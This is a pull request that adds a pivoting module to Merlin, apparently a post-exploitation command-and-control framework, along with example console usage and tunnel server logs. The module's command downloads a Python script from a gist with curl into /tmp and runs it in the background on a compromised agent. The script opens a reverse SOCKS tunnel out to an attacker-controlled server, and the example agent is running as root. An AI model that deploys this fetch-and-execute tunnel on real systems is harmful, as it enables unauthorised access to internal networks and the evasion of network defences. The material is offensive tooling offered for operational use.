### PR TITLE
Added a module for Python-based SOCKS proxying

### DIFF
--- a/data/modules/linux/x64/python/pivoting/arox.json
+++ b/data/modules/linux/x64/python/pivoting/arox.json
@@ -1,0 +1,30 @@
+{
+  "base": {
+    "name": "AlmondRocks",
+    "type": "standard",
+    "author": ["Kevin Lustic"],
+    "path": ["linux", "x64", "python", "pivoting", "arox.json"],
+    "platform": "linux",
+    "arch": "x64",
+    "lang": "python",
+    "privilege": false,
+    "remote": "https://gist.githubusercontent.com/klustic/14efac58264f5a3f082f8b2731b21c93/raw/459c81af93f78c8f155cbcf16e145d4be62da972/arox.py",
+    "options": [
+      {"name": "host", "value": "", "required": true, "description":"The AlmondRocks server, specified as <IP|Domain>:<Port>"}
+    ],
+    "description": "AlmondRocks (arox) connects out to a public-facing server to tunnel SOCKSv5-wrapped comms in.",
+    "notes": "https://github.com/klustic/AlmondRocks",
+    "commands": [
+      "/bin/bash",
+      "-c",
+      "\"curl -vk -Lo /tmp/arox.py https://gist.githubusercontent.com/klustic/14efac58264f5a3f082f8b2731b21c93/raw/459c81af93f78c8f155cbcf16e145d4be62da972/arox.py; /usr/bin/python /tmp/arox.py {{host}} &\";"
+    ]
+  },
+  "additionalInstructions": {
+    "Setup": [
+      "1. Download AlmondRocks server to a publicly accessible host: https://github.com/klustic/AlmondRocks",
+      "2. Follow the README for AlmondRocks to setup the server"
+    ],
+    "Comments": "The additionalInstructions tag is ignored by Merlin and are for user consumption only."
+  }
+}


### PR DESCRIPTION
### Pull Request (PR) Checklist
- [x] I have read the [CONTRIBUTING](../CONTRIBUTING.MD) doc
- [ ] PR is from **a topic/feature/bugfix branch** off the **dev branch** (right side)
- [x] PR is against the **dev branch** (left side)
- [ ] Merlin compiles without errors
- [ ] Passes linting checks and unit tests
- [ ] Updated [CHANGELOG](../CHANGELOG.MD)
- [ ] Updated README documentation (if applicable)

### Change Type
- [x] Addition
- [ ] Bugfix
- [ ] Modification
- [ ] Removal
- [ ] Security

### Description

The SOCKS module connects out to a server, and allows you to tunnel SOCKS-wrapped connections into the target network over TLS. The server can be downloaded from https://github.com/klustic/AlmondRocks (follow the README there to set the AlmondRocks (arox) server up).

Example usage:

```
Merlin» agent list

+--------------------------------------+-------------+------+--------------+-------------+---------+
|              AGENT GUID              |  PLATFORM   | USER |     HOST     |  TRANSPORT  | STATUS  |
+--------------------------------------+-------------+------+--------------+-------------+---------+
| b93df9ce-97fe-4644-b205-d72ad41f99e4 | linux/amd64 | root | 5b56f371f161 | HTTP/2 (h2) | Delayed |
+--------------------------------------+-------------+------+--------------+-------------+---------+

Merlin» use module linux/x64/python/pivoting/arox
Merlin[module][AlmondRocks]» set host 10.30.43.78:443
[+]host set to 10.30.43.78:443
Merlin[module][AlmondRocks]» set agent b93df9ce-97fe-4644-b205-d72ad41f99e4
[+]agent set to b93df9ce-97fe-4644-b205-d72ad41f99e4
Merlin[module][AlmondRocks]» show options

Agent: b93df9ce-97fe-4644-b205-d72ad41f99e4

Module options(AlmondRocks)

  NAME  |                VALUE                 | REQUIRED |          DESCRIPTION
+-------+--------------------------------------+----------+--------------------------------+
  Agent | b93df9ce-97fe-4644-b205-d72ad41f99e4 | true     | Agent on which to run module
        |                                      |          | AlmondRocks
  host  | 10.30.43.78:443                      | true     | The AlmondRocks
        |                                      |          | server, specified as
        |                                      |          | <IP|Domain>:<Port>
Merlin[module][AlmondRocks]» run
[-]Created job zZEiTLGFUO for agent b93df9ce-97fe-4644-b205-d72ad41f99e4

ON THE AROX SERVER:

# python arox.py -v server -s 0.0.0.0:1080 -t 0.0.0.0:443 --cert /tmp/arox/bin/../ssl/cert.pem --key /tmp/arox/bin/../ssl/key.pem
[2018-12-05 22:29:07]  WARNING SocksServer: Waiting for Tunnel connections on 0.0.0.0:443
[2018-12-05 22:46:03]  WARNING SocksServer: Accepted Tunnel connection from 172.17.0.1:50216
[2018-12-05 22:46:03]     INFO SocksServer: Listening for SOCKSv5 clients on 0.0.0.0:1080
[2018-12-05 22:47:28]     INFO SocksServer: Created new channel: <Channel id=4074514444 remote_addr=None local_addr=127.0.0.1:44506>
[2018-12-05 22:47:28]     INFO SocksServer: Channel connected remotely: <Channel id=4074514444 remote_addr=google.com[172.217.2.14]:80 local_addr=127.0.0.1:44506>
[2018-12-05 22:47:28]     INFO Tunnel: Closed channel: <Channel id=4074514444 remote_addr=google.com[172.217.2.14]:80 local_addr=127.0.0.1:44506>
[2018-12-05 22:47:34]     INFO SocksServer: Created new channel: <Channel id=4074514445 remote_addr=None local_addr=127.0.0.1:44510>
[2018-12-05 22:47:34]     INFO SocksServer: Channel connected remotely: <Channel id=4074514445 remote_addr=google.com[172.217.2.14]:443 local_addr=127.0.0.1:44510>
[2018-12-05 22:47:35]     INFO Tunnel: Closed channel: <Channel id=4074514445 remote_addr=google.com[172.217.2.14]:443 local_addr=127.0.0.1:44510>
[2018-12-05 22:47:38]     INFO SocksServer: Created new channel: <Channel id=4074514446 remote_addr=None local_addr=127.0.0.1:44514>
[2018-12-05 22:47:38]     INFO SocksServer: Channel connected remotely: <Channel id=4074514446 remote_addr=www.google.com[172.217.6.36]:443 local_addr=127.0.0.1:44514>
[2018-12-05 22:47:39]     INFO Tunnel: Closed channel: <Channel id=4074514446 remote_addr=www.google.com[172.217.6.36]:443 local_addr=127.0.0.1:44514>
```